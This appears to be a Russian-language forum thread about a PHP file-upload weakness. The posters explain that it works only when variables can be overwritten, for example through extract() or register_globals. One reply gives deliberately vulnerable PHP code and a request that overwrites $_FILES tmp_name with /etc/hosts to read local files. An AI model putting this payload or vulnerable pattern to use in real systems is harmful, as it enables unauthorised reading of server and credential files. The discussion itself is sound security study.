Читал книгу наткнулся на это попробовал уязвимость на практике но ничего не вышло Что имел ввиду автор? Ведь название временного файла генерируется автоматически и даже если мы откроем скрипт словим POST и вместо названия напишем etc/passwd ничего не произойдет! http://uploads.ru/94nJd.jpg
Большая часть текста взята из мана PHP. Смею предположить, что имеется в виду какой-то частный случай типа extract, $$val или register_globals=On.
При возможности перезаписи значений переменных возможна атака. @crlf прав. Начинка https://github.com/php/php-src/blob/master/ext/standard/basic_functions.c#L5808
Пример: PHP: <?php$info = $_REQUEST;extract($info);/* . . SOME CODE . . */foreach($_FILES as $key => $value) { $file = $key; $name = $value['name']; $type = $value['type']; $data = file_get_contents($value['tmp_name']); $send .= "--$boundary\r\nContent-Disposition: form-data; name=\"$file\"; filename=\"$name\"\r\nContent-Type: $type\r\n\r\n".$data."\r\n";}echo $send;?> http://localhost/test.php?_FILES[][tmp_name]=/etc/hosts